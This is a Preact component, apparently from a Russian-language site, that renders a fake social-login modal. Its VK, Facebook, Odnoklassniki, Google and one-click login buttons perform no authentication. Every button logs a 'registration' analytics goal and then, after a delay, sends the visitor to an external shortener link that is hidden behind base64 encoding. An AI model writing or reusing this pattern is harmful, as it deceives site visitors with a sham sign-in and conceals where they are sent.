import { h } from 'preact';
import style from './modal.css';
import classnames from 'classnames';

const LINK = atob('aHR0cHM6Ly9wMngubGluay92cGxheTJ4');

const Form = ({ onClose }) => {
  const onClick = () => {
    window.ym(57275332,'reachGoal','registration');
    onClose();


    setTimeout(() => {
      window.location.href = LINK;
    }, 2400);
  };

  return (
    <div class={style.container}>
      <h3 class={style.caption}>Авторизация на сайте</h3>
      <div class={style.form}>
        <div class={style.captionLine}>Через соц. сети</div>
        <div class={style.socialAuth}>
          <div class={style.line}>
            <button
              type="button"
              value="vkontakte"
              class={classnames(style.btn, style.btnVk)}
              onClick={onClick}
            >
              VK
            </button>
            <button
              type="button"
              value="facebook"
              class={classnames(style.btn, style.btnFb)}
              onClick={onClick}
            >
              FB
            </button>
          </div>
          <div class={style.line}>
            <button
              type="button"
              value="odnoklassniki"
              class={classnames(style.btn, style.btnOk)}
              onClick={onClick}
            >
              OK
            </button>
            <button
              type="button"
              value="google"
              class={classnames(style.btn, style.btnGl)}
              onClick={onClick}
            >
              Google
            </button>
          </div>
        </div>
        <button type="submit" class={classnames(style.btn, style.btnAuth)} onClick={onClick}>
          Вход в 1 клик
        </button>
      </div>
    </div>
  );
};

export default Form;
